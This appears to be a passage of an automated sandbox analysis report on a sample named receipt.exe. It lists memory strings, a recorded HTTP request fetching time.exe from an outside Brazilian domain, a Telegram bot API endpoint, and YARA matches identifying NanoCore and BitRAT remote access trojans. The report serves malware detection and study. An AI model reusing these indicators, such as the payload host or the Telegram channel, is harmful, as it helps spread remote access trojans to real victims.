            Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
            Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
            Source: Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
            Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0K
            Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0N
            Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
            Source: receipt.exe, 0000001A.00000002.601877963.0000000003223000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: receipt.exe, 00000000.00000002.346028348.00000000030C5000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.345187251.0000000002FCB000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.548032095.0000000002E71000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.489168945.0000000002AB5000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.486429428.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.514450713.0000000002B9F000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.545604366.0000000002EF3000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.518107476.0000000002C55000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 00000017.00000002.595827301.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 00000017.00000002.605315953.00000000032C4000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 00000018.00000002.605861442.0000000003464000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 00000018.00000002.598901171.00000000033D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: time[1].exe.25.drString found in binary or memory: https://curl.haxx.se/docs/http-cookies.html
            Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
            Source: Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
            Source: receipt.exe, 00000000.00000003.339858052.0000000004507000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.348239622.00000000033A8000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000003.340569234.0000000004708000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 00000000.00000002.358530884.0000000005890000.00000004.08000000.00040000.00000000.sdmp, receipt.exe, 0000000C.00000002.572932593.000000000409E000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.570941039.0000000003FFE000.00000004.00000800.00020000.00000000.sdmp, receipt.exe, 0000000C.00000002.553653041.0000000002FA8000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000D.00000002.500622639.0000000002DA9000.00000004.00000800.00020000.00000000.sdmp, Uewizrlgm.exe, 0000000E.00000002.547173686.0000000002F48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
            Source: time[1].exe.25.drString found in binary or memory: https://www.openssl.org/H
            Source: unknownDNS traffic detected: queries for: servproviders.com.br
            Source: global trafficHTTP traffic detected: GET /time.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: servproviders.com.brConnection: Keep-Alive

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 12.2.receipt.exe.3f72bc0.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.receipt.exe.3fc2be0.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.receipt.exe.3f4aba0.2.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.receipt.exe.3f72bc0.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 26.0.receipt.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.receipt.exe.3fc2be0.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 12.2.receipt.exe.3f4aba0.2.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000001A.00000000.520669433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.568818536.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.563939937.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000C.00000002.566317945.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: receipt.exe PID: 5804, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: receipt.exe PID: 1840, type: MEMORYSTR

            System Summary

            barindex
            Source: 12.2.receipt.exe.3f72bc0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 12.2.receipt.exe.3f72bc0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
            Source: 12.2.receipt.exe.3f72bc0.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 12.2.receipt.exe.3f72bc0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
            Source: 12.2.receipt.exe.3fc2be0.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 12.2.receipt.exe.3fc2be0.4.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
            Source: 12.2.receipt.exe.3fc2be0.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 12.2.receipt.exe.3fc2be0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
            Source: 12.2.receipt.exe.2f868a0.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 12.2.receipt.exe.2f868a0.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
            Source: 12.2.receipt.exe.2f868a0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 12.2.receipt.exe.2f868a0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
            Source: 12.2.receipt.exe.3f4aba0.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 12.2.receipt.exe.3f4aba0.2.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
            Source: 12.2.receipt.exe.3f4aba0.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 12.2.receipt.exe.3f4aba0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
            Source: 26.2.receipt.exe.32294f4.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 26.2.receipt.exe.32294f4.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
            Source: 26.2.receipt.exe.32294f4.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
            Source: 12.2.receipt.exe.3f72bc0.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 12.2.receipt.exe.3f72bc0.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
            Source: 12.2.receipt.exe.3f72bc0.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 12.2.receipt.exe.3f72bc0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
            Source: 12.2.receipt.exe.2f868a0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 12.2.receipt.exe.2f868a0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
            Source: 12.2.receipt.exe.2f868a0.0.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 12.2.receipt.exe.2f868a0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
            Source: 26.0.receipt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 26.0.receipt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
            Source: 26.0.receipt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 26.0.receipt.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
            Source: 12.2.receipt.exe.3fc2be0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 12.2.receipt.exe.3fc2be0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
            Source: 12.2.receipt.exe.3fc2be0.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 12.2.receipt.exe.3fc2be0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
            Source: 12.2.receipt.exe.3f4aba0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 12.2.receipt.exe.3f4aba0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
            Source: 12.2.receipt.exe.3f4aba0.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 12.2.receipt.exe.3f4aba0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
            Source: 0000000C.00000002.552831356.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000C.00000002.552831356.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000C.00000002.552831356.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
            Source: 0000001A.00000000.520669433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000001A.00000000.520669433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000001A.00000000.520669433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
            Source: 0000000C.00000002.568818536.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000C.00000002.568818536.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000C.00000002.568818536.0000000003FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
            Source: 0000000C.00000002.563939937.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000C.00000002.563939937.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000C.00000002.563939937.0000000003E71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
            Source: 0000000C.00000002.566317945.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 0000000C.00000002.566317945.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 0000000C.00000002.566317945.0000000003F23000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
            Source: 0000001A.00000002.601877963.0000000003223000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
            Source: Process Memory Space: receipt.exe PID: 5804, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: receipt.exe PID: 5804, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: receipt.exe PID: 5804, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
            Source: Process Memory Space: receipt.exe PID: 1840, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: Process Memory Space: receipt.exe PID: 1840, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: Process Memory Space: receipt.exe PID: 1840, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
            Source: C:\Users\user\AppData\Local\Temp\uIyibZtq20fMk9Yx.exe, type: DROPPEDMatched rule: Detects BitRAT RAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\time[1].exe, type: DROPPEDMatched rule: Detects BitRAT RAT Author: ditekSHen
            Source: initial sampleStatic PE information: Filename: receipt.exe
            Source: receipt.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 12.2.receipt.exe.3f72bc0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 12.2.receipt.exe.3f72bc0.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 12.2.receipt.exe.3f72bc0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
            Source: 12.2.receipt.exe.3f72bc0.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 12.2.receipt.exe.3f72bc0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
            Source: 12.2.receipt.exe.3fc2be0.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 12.2.receipt.exe.3fc2be0.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 12.2.receipt.exe.3fc2be0.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
            Source: 12.2.receipt.exe.3fc2be0.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 12.2.receipt.exe.3fc2be0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
            Source: 12.2.receipt.exe.2f868a0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 12.2.receipt.exe.2f868a0.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 12.2.receipt.exe.2f868a0.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
            Source: 12.2.receipt.exe.2f868a0.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
            Source: 12.2.receipt.exe.2f868a0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
            Source: 12.2.receipt.exe.3f4aba0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 12.2.receipt.exe.3f4aba0.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: 12.2.receipt.exe.3f4aba0.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
